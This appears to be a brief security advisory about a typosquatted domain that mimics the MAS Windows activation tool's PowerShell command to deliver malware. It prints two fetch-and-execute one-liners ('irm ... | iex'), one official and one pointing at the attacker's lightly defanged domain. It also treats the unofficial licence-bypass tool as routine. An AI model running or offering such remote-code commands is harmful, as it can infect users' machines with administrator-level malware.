Ddos 
The well-known activation tool MAS offers a PowerShell command that allows users to load an activation script online and execute it instantly. Compared with downloading and running a separate utility, this online approach is undeniably convenient, although it requires users to manually type or paste the command each time. Because the script is fetched online, it relies on a domain name. The official MAS activation command—and the domain it uses—is as follows:
irm https://get.activated.win | iex
However, attackers have registered a deceptively similar domain to distribute malware:
irm hxxps://get.activate.win | iex
The difference is a single missing letter—just a “d”—which is easy to overlook when typing. As a result, some users may inadvertently execute the attacker’s counterfeit version. That fake script does, in fact, activate the system (MAS itself is open source), but at the same time it silently installs malicious software.
Because the MAS activation command must be run with administrator privileges, there is effectively nothing preventing an attacker from deploying malware once those privileges are granted. After executing the forged command, a system may end up hosting multiple malicious components and even become subject to remote control.
The MAS team has urged users to carefully verify the command before running it. When in doubt, they recommend visiting the official MAS website each time and copying the command directly, rather than typing it manually. Users should also remain alert to the possibility of fake MAS websites—although none have been confirmed so far.
Donate